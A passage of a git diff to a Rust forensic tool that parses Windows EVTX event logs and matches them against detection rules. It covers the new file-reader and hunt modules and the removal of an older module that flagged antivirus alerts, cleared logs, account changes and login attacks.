Pattern::FGreaterThan(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThan, + Box::new(Expression::Float(i)), + ), + Pattern::FGreaterThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::GreaterThanOrEqual, + Box::new(Expression::Float(i)), + ), + Pattern::FLessThan(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThan, + Box::new(Expression::Float(i)), + ), + Pattern::FLessThanOrEqual(i) => Expression::BooleanExpression( + Box::new(Expression::Field(key.to_owned())), + BoolSym::LessThanOrEqual, + Box::new(Expression::Float(i)), + ), + Pattern::Any => Expression::Search(Search::Any, key.to_owned()), + Pattern::Regex(c) => Expression::Search(Search::Regex(c), key.to_owned()), + Pattern::Contains(c) => Expression::Search( + if identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::Contains(c)], + ) + } else { + Search::Contains(c) + }, + key.to_owned(), + ), + Pattern::EndsWith(c) => Expression::Search( + if identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::EndsWith(c)], + ) + } else { + Search::EndsWith(c) + }, + key.to_owned(), + ), + Pattern::Exact(c) => Expression::Search( + if !c.is_empty() && identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::Exact(c)], + ) + } else { + Search::Exact(c) + }, + key.to_owned(), + ), + Pattern::StartsWith(c) => Expression::Search( + if identifier.ignore_case { + Search::AhoCorasick( + Box::new( + AhoCorasickBuilder::new() + .ascii_case_insensitive(true) + .dfa(true) + .build(vec![c.clone()]), + ), + vec![MatchType::StartsWith(c)], + ) + } else { + Search::StartsWith(c) + }, + key.to_owned(), + ), + }; + Ok(expression) +} diff --git a/src/file/evtx.rs b/src/file/evtx.rs new file mode 100644 index 00000000..6666ab89 --- /dev/null +++ b/src/file/evtx.rs @@ -0,0 +1,93 @@ +use std::collections::{HashMap, HashSet}; +use std::fs::File; +use std::path::Path; + +use evtx::{err::EvtxError, EvtxParser, ParserSettings, SerializedEvtxRecord}; +use regex::RegexSet; +use serde_json::Value as Json; +use tau_engine::{Document, Value as Tau}; + +use crate::hunt::{Group, Huntable}; +use crate::rule::Rule; +use crate::search::Searchable; + +pub type Evtx = SerializedEvtxRecord; + +pub struct Parser { + pub inner: EvtxParser, +} + +impl Parser { + pub fn load(file: &Path) -> crate::Result { + let settings = ParserSettings::default() + .separate_json_attributes(true) + .num_threads(0); + let parser = EvtxParser::from_path(file)?.with_configuration(settings); + Ok(Self { inner: parser }) + } + + pub fn parse( + &mut self, + ) -> impl Iterator, EvtxError>> + '_ { + self.inner.records_json_value() + } +} + +pub struct Mapper<'a>(&'a HashMap, &'a Wrapper<'a>); +impl<'a> Document for Mapper<'a> { + fn find(&self, key: &str) -> Option> { + self.0.get(key).and_then(|v| self.1.find(v)) + } +} + +pub struct Wrapper<'a>(pub &'a Json); +impl<'a> Document for Wrapper<'a> { + fn find(&self, key: &str) -> Option> { + // As event logs can store values in a key or complex objects we do some aliasing here for + // convenience... + match key { + "Event.System.EventID" => { + // FIXME: If `#text` returns text then we need to map this to a u64 otherwise it + // will be ignored... + self.0 + .find("Event.System.EventID.#text") + .or(self.0.find(key)) + } + "Event.System.Provider" => self.0.find("Event.System.Provider_attributes.Name"), + "Event.System.TimeCreated" => self + .0 + .find("Event.System.TimeCreated_attributes.SystemTime"), + _ => self.0.find(key), + } + } +} + +impl Huntable for &SerializedEvtxRecord { + fn hits( + &self, + rules: &[Rule], + exclusions: &HashSet, + group: &Group, + ) -> Option> { + let wrapper = Wrapper(&self.data); + if tau_engine::core::solve(&group.filter, &wrapper) { + let mut tags = vec![]; + for rule in rules { + if exclusions.contains(&rule.tag) { + continue; + } + if rule.tau.matches(&Mapper(&group.fields, &wrapper)) { + tags.push(rule.tag.clone()); + } + } + return Some(tags); + } + None + } +} + +impl Searchable for SerializedEvtxRecord { + fn matches(&self, regex: &RegexSet) -> bool { + regex.is_match(&self.data.to_string()) + } +} diff --git a/src/file/mod.rs b/src/file/mod.rs new file mode 100644 index 00000000..e1562f13 --- /dev/null +++ b/src/file/mod.rs @@ -0,0 +1,132 @@ +use std::fs; +use std::path::{Path, PathBuf}; + +use self::evtx::{Evtx, Parser as EvtxParser}; + +pub mod evtx; + +pub enum Document { + Evtx(Evtx), +} + +pub struct Documents<'a> { + iterator: Box> + 'a>, +} + +impl<'a> Iterator for Documents<'a> { + type Item = crate::Result; + + fn next(&mut self) -> Option { + self.iterator.next() + } +} + +pub struct Unknown; +impl Iterator for Unknown { + type Item = crate::Result; + + fn next(&mut self) -> Option { + None + } +} + +pub enum Parser { + Evtx(EvtxParser), + Unknown, +} + +pub struct Reader { + parser: Parser, +} + +impl Reader { + pub fn load(file: &Path, load_unknown: bool, skip_errors: bool) -> crate::Result { + // NOTE: We don't want to use libmagic because then we have to include databases etc... So + // for now we assume that the file extensions are correct! + match file.extension().and_then(|e| e.to_str()) { + Some(extension) => match extension { + "evtx" => Ok(Self { + parser: Parser::Evtx(EvtxParser::load(file)?), + }), + _ => { + if load_unknown { + if skip_errors { + cs_eyellowln!("file type is not currently supported - {}", extension); + Ok(Self { + parser: Parser::Unknown, + }) + } else { + anyhow::bail!("file type is not currently supported - {}", extension) + } + } else { + Ok(Self { + parser: Parser::Unknown, + }) + } + } + }, + None => { + if load_unknown { + if let Ok(parser) = EvtxParser::load(file) { + return Ok(Self { + parser: Parser::Evtx(parser), + }); + } + if skip_errors { + cs_eyellowln!("file type is not known"); + + Ok(Self { + parser: Parser::Unknown, + }) + } else { + anyhow::bail!("file type is not known") + } + } else { + Ok(Self { + parser: Parser::Unknown, + }) + } + } + } + } + + pub fn documents<'a>(&'a mut self) -> Documents<'a> { + let iterator = match &mut self.parser { + Parser::Evtx(parser) => Box::new( + parser + .parse() + .map(|r| r.map(|d| Document::Evtx(d)).map_err(|e| e.into())), + ), + Parser::Unknown => { + Box::new(Unknown) as Box> + 'a> + } + }; + Documents { iterator } + } +} + +pub fn get_files(path: &PathBuf, extension: &Option) -> crate::Result> { + let mut files: Vec = vec![]; + if path.exists() { + let metadata = fs::metadata(&path)?; + if metadata.is_dir() { + let directory = path.read_dir()?; + for dir in directory { + files.extend(get_files(&dir?.path(), &extension)?); + } + } else { + if let Some(extension) = extension { + if let Some(ext) = path.extension() { + if ext == extension.as_str() { + files.push(path.to_path_buf()); + } + } + } else { + files.push(path.to_path_buf()); + } + } + } else { + anyhow::bail!("Invalid input path: {}", path.display()); + } + Ok(files) +} diff --git a/src/hunt.rs b/src/hunt.rs new file mode 100644 index 00000000..28f5da7e --- /dev/null +++ b/src/hunt.rs @@ -0,0 +1,356 @@ +use std::collections::{HashMap, HashSet}; +use std::fs::File; +use std::io::Read; +use std::path::{Path, PathBuf}; + +use chrono::{DateTime, NaiveDateTime, TimeZone, Utc}; +use chrono_tz::Tz; +use serde::{de, Deserialize, Serialize}; +use serde_json::Value as Json; +use serde_yaml::Value as Yaml; +use tau_engine::{ + core::parser::{parse_identifier, Expression}, + Document as Docu, +}; + +use crate::file::{Document as Doc, Reader}; +use crate::rule::{Kind as RuleKind, Rule}; + +#[derive(Deserialize)] +pub struct Group { + #[serde(default)] + pub default: Option>, + pub fields: HashMap, + #[serde(deserialize_with = "deserialize_expression")] + pub filter: Expression, + pub name: String, + pub timestamp: String, +} + +fn deserialize_expression<'de, D>(deserializer: D) -> Result +where + D: de::Deserializer<'de>, +{ + let yaml: Yaml = de::Deserialize::deserialize(deserializer)?; + parse_identifier(&yaml).map_err(de::Error::custom) +} + +#[derive(Deserialize)] +pub struct Mapping { + #[serde(default)] + pub exclusions: HashSet, + pub groups: Vec, + pub kind: String, + pub name: String, + pub rules: RuleKind, +} + +pub struct Hit { + pub group: String, + pub mapping: Option, + pub tag: String, + pub timestamp: NaiveDateTime, +} + +pub struct Detections { + pub hits: Vec, + pub kind: Kind, +} + +#[derive(Debug, Serialize)] +pub struct Detection<'a> { + pub authors: &'a Vec, + pub group: &'a String, + #[serde(flatten)] + pub kind: &'a Kind, + pub level: &'a String, + pub name: &'a String, + pub source: &'a String, + pub status: &'a String, + pub timestamp: String, +} + +#[derive(Debug, Serialize)] +pub struct Document { + pub kind: String, + pub data: Json, +} + +#[derive(Debug, Serialize)] +#[serde(rename_all = "snake_case", tag = "kind")] +pub enum Kind { + Aggregate { documents: Vec }, + Individual { document: Document }, +} + +pub trait Huntable { + fn hits( + &self, + rules: &[Rule], + exclusions: &HashSet, + group: &Group, + ) -> Option>; +} + +#[derive(Default)] +pub struct HunterBuilder { + mappings: Option>, + rules: Option>, + + load_unknown: Option, + local: Option, + from: Option, + skip_errors: Option, + timezone: Option, + to: Option, +} + +impl HunterBuilder { + pub fn new() -> Self { + Self::default() + } + + pub fn build(self) -> crate::Result { + let mappings = match self.mappings { + Some(mappings) => { + let mut scratch = vec![]; + for mapping in mappings { + let mut file = File::open(mapping)?; + let mut content = String::new(); + file.read_to_string(&mut content)?; + scratch.push(serde_yaml::from_str(&mut content)?); + } + scratch + } + None => vec![], + }; + let rules = match self.rules { + Some(rules) => rules, + None => vec![], + }; + + let load_unknown = self.load_unknown.unwrap_or_default(); + let local = self.local.unwrap_or_default(); + let skip_errors = self.skip_errors.unwrap_or_default(); + + Ok(Hunter { + inner: HunterInner { + mappings, + rules, + + from: self.from.map(|d| DateTime::from_utc(d, Utc)), + load_unknown, + local, + skip_errors, + timezone: self.timezone, + to: self.to.map(|d| DateTime::from_utc(d, Utc)), + }, + }) + } + + pub fn from(mut self, datetime: NaiveDateTime) -> Self { + self.from = Some(datetime); + self + } + + pub fn load_unknown(mut self, allow: bool) -> Self { + self.load_unknown = Some(allow); + self + } + + pub fn local(mut self, local: bool) -> Self { + self.local = Some(local); + self + } + + pub fn mappings(mut self, paths: Vec) -> Self { + self.mappings = Some(paths); + self + } + + pub fn rules(mut self, rules: Vec) -> Self { + self.rules = Some(rules); + self + } + + pub fn skip_errors(mut self, skip: bool) -> Self { + self.skip_errors = Some(skip); + self + } + + pub fn timezone(mut self, tz: Tz) -> Self { + self.timezone = Some(tz); + self + } + + pub fn to(mut self, datetime: NaiveDateTime) -> Self { + self.to = Some(datetime); + self + } +} + +pub struct HunterInner { + mappings: Vec, + rules: Vec, + + load_unknown: bool, + local: bool, + from: Option>, + skip_errors: bool, + timezone: Option, + to: Option>, +} + +pub struct Hunter { + inner: HunterInner, +} + +impl Hunter { + pub fn builder() -> HunterBuilder { + HunterBuilder::new() + } + + pub fn hunt(&self, file: &Path) -> crate::Result> { + let mut reader = Reader::load(file, self.inner.load_unknown, self.inner.skip_errors)?; + let mut detections = vec![]; + for document in reader.documents() { + let document = match document { + Ok(document) => document, + Err(e) => { + if self.inner.skip_errors { + continue; + } + return Err(e); + } + }; + + // The logic is as follows, all rules except chainsaw ones need a mapping. + + // TODO: Handle chainsaw rules... + + for mapping in &self.inner.mappings { + if mapping.kind != "evtx" { + continue; + } + + let mut hits = vec![]; + for group in &mapping.groups { + // TODO: Default to RFC 3339 + let timestamp = match &document { + Doc::Evtx(evtx) => { + match crate::evtx::Wrapper(&evtx.data).find(&group.timestamp) { + Some(value) => match value.as_str() { + Some(timestamp) => match NaiveDateTime::parse_from_str( + timestamp, + "%Y-%m-%dT%H:%M:%S%.6fZ", + ) { + Ok(t) => t, + Err(e) => { + if self.inner.skip_errors { + cs_eyellowln!( + "failed to parse timestamp '{}' - {}", + timestamp, + e, + ); + continue; + } else { + anyhow::bail!( + "failed to parse timestamp '{}' - {}", + timestamp, + e + ); + } + } + }, + None => continue, + }, + None => continue, + } + } + }; + + if self.inner.from.is_some() || self.inner.to.is_some() { + // TODO: Not sure if this is correct... + let localised = if let Some(timezone) = self.inner.timezone { + let local = match timezone.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + }; + local.with_timezone(&Utc) + } else if self.inner.local { + match Utc.from_local_datetime(×tamp).single() { + Some(l) => l, + None => { + if self.inner.skip_errors { + cs_eyellowln!("failed to localise timestamp"); + continue; + } else { + anyhow::bail!("failed to localise timestamp"); + } + } + } + } else { + DateTime::::from_utc(timestamp, Utc) + }; + // Check if event is older than start date marker + if let Some(sd) = self.inner.from { + if localised <= sd { + continue; + } + } + // Check if event is newer than end date marker + if let Some(ed) = self.inner.to { + if localised >= ed { + continue; + } + } + } + if let Some(tags) = match &document { + Doc::Evtx(evtx) => evtx.hits(&self.inner.rules, &mapping.exclusions, group), + } { + for tag in tags { + hits.push(Hit { + tag, + group: group.name.clone(), + mapping: Some(mapping.name.clone()), + timestamp, + }); + } + } + } + + if hits.is_empty() { + continue; + } + let data = match &document { + Doc::Evtx(evtx) => evtx.data.clone(), + }; + detections.push(Detections { + hits, + kind: Kind::Individual { + document: Document { + kind: "evtx".to_owned(), + data, + }, + }, + }); + } + } + Ok(detections) + } + + pub fn mappings(&self) -> &Vec { + &self.inner.mappings + } + + pub fn rules(&self) -> &Vec { + &self.inner.rules + } +} diff --git a/src/hunt/mod.rs b/src/hunt/mod.rs deleted file mode 100644 index 9fb72105..00000000 --- a/src/hunt/mod.rs +++ /dev/null @@ -1,873 +0,0 @@ -use std::collections::HashMap; -use std::fs::{create_dir_all, metadata, File}; -use std::io::Read; -use std::path::{Path, PathBuf}; - -use anyhow::Result; -use chrono::NaiveDateTime; -use itertools::Itertools; -use prettytable::format; -use prettytable::row::Row; -use prettytable::Table; -use structopt::StructOpt; -use walkdir::WalkDir; - -use crate::convert::{sigma, stalker}; -use crate::util::RULE_PREFIX; -use crate::util::{get_evtx_files, get_progress_bar, large_event_logs, parse_evtx_file}; - -pub(crate) mod modules; - -#[derive(StructOpt)] -pub struct HuntOpts { - /// Specify an EVTX file, or a directory containing the EVTX files to search. - /// If you specify a directory, all files matching *.evtx will be used. - /// - /// Specifying "win_default" will use "C:\Windows\System32\winevt\Logs\" - pub evtx_path: PathBuf, - - /// Suppress all unnecessary output - #[structopt(short = "q", long = "quiet")] - pub quiet: bool, - - /// Skip EVTX file if chainsaw is unable to parse the records - #[structopt(long = "ignore-errors")] - pub ignore: bool, - - // Specify the detection rule directory to use - // - /// Specify a directory containing detection rules to use. All files matching *.yml will be used. - #[structopt(short = "r", long = "rules")] - pub rules_path: Option, - - // Specify a mapping file - // - /// Specify the mapping file to use to with the specified detection rules. - /// Required when using the --rule/-r flag - #[structopt(short = "m", long = "mapping")] - pub mapping_path: Option, - - /// List additional 4624 events potentially relating to lateral movement - #[structopt(long = "lateral-all")] - pub lateral_all: bool, - - /// Save hunt output to individual CSV files in the specified directory - #[structopt(long = "csv", group = "format")] - pub csv: Option, - - /// Show rule author information in table output - #[structopt(long = "authors")] - pub show_authors: bool, - - /// Show full event output, otherwise output is trunctated to improve readability - #[structopt(long = "full")] - pub full_output: bool, - - /// For each detection, output the associated event log entry and detection information in a JSON format - #[structopt(short, long = "json", group = "format")] - pub json: bool, - - /// Do not use inbuilt detection logic, only use the specified rules for detection - #[structopt(long = "no-builtin")] - pub disable_inbuilt_logic: bool, - - /// Change the maximum column width (default 40). Use this option if the table output is un-readable - #[structopt(long = "col-width", default_value = "40")] - pub col_width: i32, - - /// Start date for including events (UTC). Anything older than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. Example: 2019-11-17T17:55:11 - #[structopt(long = "start-date")] - pub start_date: Option, - - /// End date for including events (UTC). Anything newer than this is dropped. Format: YYYY-MM-DDTHH:MM:SS. Example: 2019-11-17T17:55:11 - #[structopt(long = "end-date")] - pub end_date: Option, - - /// File to write output to, this is ignored by --csv - #[structopt(long = "output")] - pub output: Option, -} - -#[derive(Serialize)] -pub struct JsonDetection { - detection: Vec, - event: serde_json::Value, -} - -#[derive(Clone)] -pub struct Detection { - headers: Vec, - title: String, - values: Vec, -} - -#[derive(Clone, Deserialize)] -#[serde(rename_all = "lowercase")] -pub struct ChainsawRule { - pub level: Option, - #[serde(flatten)] - pub logic: tau_engine::Rule, - #[serde(alias = "title")] - pub tag: String, - pub status: Option, - pub authors: Option>, -} - -#[derive(Debug, PartialEq, Deserialize)] -pub struct Events { - provider: String, - search_fields: HashMap, - table_headers: HashMap, - title: String, -} - -#[derive(Debug, PartialEq, Deserialize)] -pub struct Mapping { - pub exclusions: Option>, - pub kind: String, - pub mappings: HashMap, -} - -enum Provider { - Defender, - EventLogAction, - FSecure, - Kaspersky, - SecurityAuditing, - ServiceControl, - Sophos, -} - -pub enum RuleType { - Stalker, - Sigma, -} - -impl RuleType { - pub fn from(kind: &str) -> Option { - match kind.to_lowercase().as_str() { - "sigma" => Some(RuleType::Sigma), - "stalker" => Some(RuleType::Stalker), - &_ => None, - } - } -} - -impl Provider { - fn resolve(provider: Option) -> Option { - if let Some(p) = provider { - match p.as_str() { - "F-Secure Ultralight SDK" => return Some(Provider::FSecure), - "Microsoft-Windows-Eventlog" => return Some(Provider::EventLogAction), - "Microsoft-Windows-Security-Auditing" => return Some(Provider::SecurityAuditing), - "Microsoft-Windows-Windows Defender" => return Some(Provider::Defender), - "OnDemandScan" => return Some(Provider::Kaspersky), - "Real-time file protection" => return Some(Provider::Kaspersky), - "Service Control Manager" => return Some(Provider::ServiceControl), - "Sophos Anti-Virus" => return Some(Provider::Sophos), - &_ => return None, - } - } - None - } -} - -pub fn det_to_json( - det: Detection, - event: serde_json::Value, - target: &str, -) -> Result { - let detection; - match target { - "rules" => { - // Get field containing names of detection rules that fired - let rules = match det.values.get(2) { - Some(r) => r, - None => return Err(anyhow!("Failed to get rules from detection!")), - }; - detection = rules - .replace("\n", " ") - .split(RULE_PREFIX) - .map(|s| s.trim_end()) - .map(|s| s.to_string()) - .filter(|s| !s.is_empty()) - .collect(); - } - "title" => { - detection = vec![det.title]; - } - _ => return Err(anyhow!("Unsupported target for det_to_json!")), - } - Ok(JsonDetection { detection, event }) -} - -pub fn run_hunt(opt: HuntOpts) -> Result { - // Main function for parsing and hunting through event logs - let evtx_files = get_evtx_files(&opt.evtx_path)?; - let mut det = None; - let mut grouped_events = HashMap::new(); - let mut hunt_detections = Vec::new(); - let mut json_detections = Vec::new(); - let mut mapping_file = None; - let mut sd_marker = None; - let mut ed_marker = None; - - let time_format = "%Y-%m-%dT%H:%M:%S"; - - // if start date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.start_date { - sd_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events before: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided start-date filter: {}", e)), - } - } - - // if end date filter is provided, validate that the provided string is a valid timestamp - if let Some(x) = &opt.end_date { - ed_marker = match NaiveDateTime::parse_from_str(x.as_str(), time_format) { - Ok(a) => { - cs_eprintln!("[+] Filtering out events after: {}", a); - Some(a) - } - Err(e) => return Err(anyhow!("Error parsing provided end-date filter: {}", e)), - } - } - - // If detection rules are provided we need to load, convert and apply mapping file - let detection_rules = match &opt.rules_path { - Some(rules) => { - match opt.mapping_path.clone() { - Some(file) => { - // Load and check mapping file - mapping_file = Some(get_mapping_file(&file)?); - } - None => { - return Err(anyhow!( - "A mapping file must be specified when using detection rules, use --mapping to specify one" - )); - } - }; - cs_eprintln!("[+] Converting detection rules..."); - // Load detection rules - Some(load_detection_rules( - rules, - false, - mapping_file.as_ref().expect("No mapping file"), - false, - )?) - } - None => { - if opt.disable_inbuilt_logic { - return Err( - anyhow!( - "In-built detection logic disabled (--no-builtin) but no detection rules provided! Use --rules to specify rules"), - ); - } - cs_eyellowln!("[!] Continuing without detection rules, no path provided"); - None - } - }; - if opt.disable_inbuilt_logic { - cs_eyellowln!( - "[!] Inbuilt detection logic disabled (--no-builtin). Only using specified rule files" - ); - } - - if large_event_logs(&evtx_files) { - cs_eyellowln!( - "[!] Provided event logs are over 500MB in size. This will take a while to parse...", - ); - } - // Set up progress bar - let pb = get_progress_bar(evtx_files.len() as u64, "Hunting".to_string()); - // Loop through EVTX files and perform actions - for evtx in &evtx_files { - pb.tick(); - // Parse EVTX files - let mut parser = match parse_evtx_file(evtx) { - Ok(a) => a, - Err(e) => { - if opt.ignore { - continue; - } - return Err(anyhow!("{:?} - {}", evtx, e)); - } - }; - // Loop through records and hunt for suspicious indicators - for record in parser.records_json_value() { - let r = match record { - Ok(record) => record, - Err(_) => { - continue; - } - }; - // Perform start/end datetime filtering - if sd_marker.is_some() || ed_marker.is_some() { - let event_time = match NaiveDateTime::parse_from_str( - r.data["Event"]["System"]["TimeCreated_attributes"]["SystemTime"] - .as_str() - .unwrap(), - "%Y-%m-%dT%H:%M:%S%.6fZ", - ) { - Ok(t) => t, - Err(_) => { - return Err(anyhow!( - "Failed to parse datetime from supplied events. This shouldn't happen...")); - } - }; - - // Check if event is older than start date marker - if let Some(sd) = sd_marker { - if event_time <= sd { - continue; - } - } - // Check if event is newer than end date marker - if let Some(ed) = ed_marker { - if event_time >= ed { - continue; - } - } - } - - let e_id; - - // Event ID can be stored in two different locations - if r.data["Event"]["System"]["EventID"]["#text"].is_null() { - e_id = &r.data["Event"]["System"]["EventID"]; - } else { - e_id = &r.data["Event"]["System"]["EventID"]["#text"]; - } - - // Convert event_id to u64 value - let e_id = match e_id.as_u64() { - Some(e) => e, - None => continue, - }; - if let Some(mapping) = &mapping_file { - if mapping.mappings.contains_key(&e_id) { - if let Some(rules) = &detection_rules { - // Pass event doc and Detection rules to processor for rule detection - if let Some(det) = modules::detect_tau_matches( - &r.data, - e_id, - rules, - &mapping.mappings, - &opt.full_output, - opt.col_width, - &opt.show_authors, - ) { - if opt.json { - json_detections.push(det_to_json( - det.clone(), - r.data.clone(), - "rules", - )?); - } - hunt_detections.push(det); - } - } - } - } - if !opt.disable_inbuilt_logic { - // - // This is where we run hunt modules on evtx records - // We either continue detect events and push them into Detection structs - // or collect events for analysis across multiple evtx files - // e.g. password-spraying - // - let raw_provider = - ajson::get(&r.data.to_string(), "Event.System.Provider_attributes.Name"); - if let Some(provider) = Provider::resolve(raw_provider) { - match provider { - // Get Defender AV Events - Provider::Defender => { - if e_id == 1116 { - det = modules::detect_defender_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - // Detect event logs being cleared - Provider::EventLogAction => { - if e_id == 1102 || e_id == 104 { - det = modules::detect_cleared_logs(&r.data, &e_id) - } - } - // Get F-Secure AV events - Provider::FSecure => { - if e_id == 2 { - det = modules::detect_ultralight_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - // Get Kaspersky AV Events - Provider::Kaspersky => { - if e_id == 3203 || e_id == 5203 { - det = modules::detect_kaspersky_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - Provider::SecurityAuditing => { - if e_id == 4728 || e_id == 4732 || e_id == 4756 { - det = modules::detect_group_changes(&r.data, &e_id) - } else if e_id == 4720 { - det = modules::detect_created_users(&r.data, &e_id) - } else if e_id == 4625 || e_id == 4624 { - if let Some(fields) = modules::extract_logon_fields(&r.data) { - grouped_events - .entry(e_id) - .or_insert_with(Vec::new) - .push(fields); - } - } - } - Provider::ServiceControl => { - if e_id == 7040 { - det = modules::detect_stopped_service(&r.data, &e_id) - } - } - // Get Sophos AV Events - Provider::Sophos => { - if e_id == 32 || e_id == 16 { - det = modules::detect_sophos_detections( - &r.data, - &e_id, - opt.full_output, - opt.col_width, - ) - } - } - }; - if let Some(d) = det { - if opt.json { - json_detections.push(det_to_json(d.clone(), r.data, "title")?); - } - hunt_detections.push(d); - det = None; - } - } - } - } - pb.inc(1); - } - // Finish the progress bar - pb.finish(); - // Print or Write results - if let Some(res) = post_process_hunt(grouped_events, &opt) { - for r in res { - hunt_detections.push(r); - } - }; - - if let Some(dir) = opt.csv { - save_hunt_results(dir, &hunt_detections)?; - } else if opt.json { - cs_print_json!(&json_detections)?; - } else { - print_hunt_results(&hunt_detections); - } - - Ok(format!("\n[+] {} Detections found", hunt_detections.len())) -} - -fn post_process_hunt( - grouped_events: HashMap>>, - hunts: &HuntOpts, -) -> Option> { - // This is where we run detection hunts which span across multiple event records - // e.g. detecting password spraying (multiple 4624 records) - // - // grouped_events format: HashMap>> - // - // Process 4625 Events - let mut results = Vec::new(); - if !hunts.disable_inbuilt_logic { - if let Some(a) = grouped_events.get(&4625) { - let detections = match modules::detect_login_attacks(a) { - Some(b) => b, - None => vec![], - }; - results.push(detections); - } - // Process 4624 Events - if let Some(a) = grouped_events.get(&4624) { - let detections = match modules::filter_lateral_movement(a, hunts) { - Some(b) => b, - None => vec![], - }; - results.push(detections); - } - } - if results.is_empty() { - return None; - } - Some(results.into_iter().flatten().collect()) -} - -fn print_hunt_results(detections: &[Detection]) { - // Create a uniq list of all hunt result titles so that we can aggregate - let detection_titles: &Vec = &detections - .iter() - .map(|x| x.title.clone()) - .unique() - .collect(); - let format = format::FormatBuilder::new() - .column_separator('│') - .borders('│') - .separators( - &[format::LinePosition::Top], - format::LineSeparator::new('─', '┬', '┌', '┐'), - ) - .separators( - &[format::LinePosition::Intern], - format::LineSeparator::new('─', '┼', '├', '┤'), - ) - .separators( - &[format::LinePosition::Bottom], - format::LineSeparator::new('─', '┴', '└', '┘'), - ) - .padding(1, 1) - .build(); - // Loop through uniq list of hunt results - for title in detection_titles { - let mut table = Table::new(); - table.set_format(format); - let mut header = false; - cs_greenln!("\n[+] Detection: {}", title); - - let mut unsorted_rows = vec![]; - // Loop through detection values and print in a table view - for detection in detections { - // Only group together results of the same hunt - if detection.title != *title { - continue; - } - if !header { - // Header builder - let mut headers = vec![]; - for c in &detection.headers { - let cell = cell!(c).style_spec("c"); - headers.push(cell); - } - table.add_row(Row::new(headers)); - header = true; - } - // Values builder - let mut values = vec![]; - for c in &detection.values { - values.push(c); - } - unsorted_rows.push(values); - } - - // Sort by timestamp to get into acending order - unsorted_rows.sort_by(|a, b| a.first().cmp(&b.first())); - - // This code block loops through rows and formats them into the prettytable-rs format - // I think this can be simplified down the line - let mut sorted_rows = vec![]; - for row in &unsorted_rows { - let mut values = vec![]; - for item in row { - values.push(cell!(item)); - } - sorted_rows.push(values) - } - - for row in sorted_rows { - table.add_row(Row::new(row)); - } - cs_print_table!(table); - } -} - -fn save_hunt_results(dir: PathBuf, detections: &[Detection]) -> Result<()> { - // Create a uniq list of all hunt result titles so that we can agg - let detection_titles: &Vec = &detections - .iter() - .map(|x| x.title.clone()) - .unique() - .collect(); - // Create output directory - create_dir_all(&dir)?; - // Loop through uniq list of hunt results - cs_println!(); - for title in detection_titles { - let mut header = false; - let mut unsorted_rows = vec![]; - // Build the final CSV filename - // TODO: This feels very hacky, maybe we shouldn't use the title for the filename in this way? - let mut filename = format!("{}.csv", title.replace(" ", "_").to_lowercase()); - if let Some(x) = filename.split('-').last() { - filename = x.to_string(); - if &filename[0..1] == "_" { - filename.remove(0); - } - } - let path = dir.join(&filename); - let mut writer = csv::Writer::from_path(path)?; - for detection in detections { - // Only group together results of the same hunt - if detection.title != *title { - continue; - } - if !header { - // Write headers to CSV - cs_eprintln!("[+] Created {}", filename); - writer.write_record(&detection.headers)?; - header = true; - } - // Values builder - let mut values = vec![]; - for c in &detection.values { - values.push(c); - } - unsorted_rows.push(values); - // Write values to CSV - } - unsorted_rows.sort_by(|a, b| a.first().cmp(&b.first())); - - let mut sorted_rows = vec![]; - for row in &unsorted_rows { - let mut values = vec![]; - for item in row { - values.push(item); - } - sorted_rows.push(values) - } - - for row in sorted_rows { - writer.write_record(row)?; - } - writer.flush()?; - } - Ok(()) -} - -pub fn get_mapping_file(path: &Path) -> Result { - let mapping: Mapping; - let md = metadata(&path)?; - if md.is_dir() { - return Err(anyhow!( - "Specified mapping file is a directory: '{}' - please specify a file", - path.display() - )); - }; - match File::open(&path) { - Ok(mut file) => { - let mut content = String::new(); - file.read_to_string(&mut content)?; - - match serde_yaml::from_str(&content) { - Ok(map) => mapping = map, - Err(error) => return Err(anyhow!("Error in {}: {}", path.display(), error)), - }; - } - Err(error) => { - return Err(anyhow!( - "Failed to load mapping file from {}: {}", - path.display(), - error - )); - } - } - match RuleType::from(&mapping.kind) { - Some(RuleType::Sigma) => {} - Some(RuleType::Stalker) => {} - None => { - return Err(anyhow!( - "Error in mapping file: '{}' is not a valid kind. 'stalker' or 'sigma' are supported options", - mapping.kind - )) - } - } - Ok(mapping) -} - -pub fn load_detection_rules( - path: &Path, - check: bool, - mapping: &Mapping, - verbose: bool, -) -> Result> { - let mut count = 0; - let mut failed = 0; - let mut chainsaw_rules: Vec = Vec::new(); - if path.exists() { - let md = metadata(&path)?; - if md.is_dir() { - // Grab all YML files from within the specified directory - let mut rule_files = Vec::new(); - for file in WalkDir::new(path) { - let file_a = file?; - if let Some(x) = file_a.path().extension() { - if x == "yml" || x == "yaml" { - rule_files.push(file_a.into_path()); - } - } - } - match RuleType::from(&mapping.kind) { - // Loop through yml files and confirm they're TAU rules - Some(RuleType::Sigma) => { - for path in rule_files { - let rules = match sigma::load(&path) { - Ok(rules) => rules, - Err(e) => { - failed += 1; - if check { - let file_name = match path.to_string_lossy().split('/').last() { - Some(e) => e.to_string(), - None => path.display().to_string(), - }; - if let Some(source) = e.source() { - cs_eprintln!("[!] {:?}: {} - {}", file_name, e, source); - } else { - cs_eprintln!("[!] {:?}: {}", file_name, e); - } - } - continue; - } - }; - if 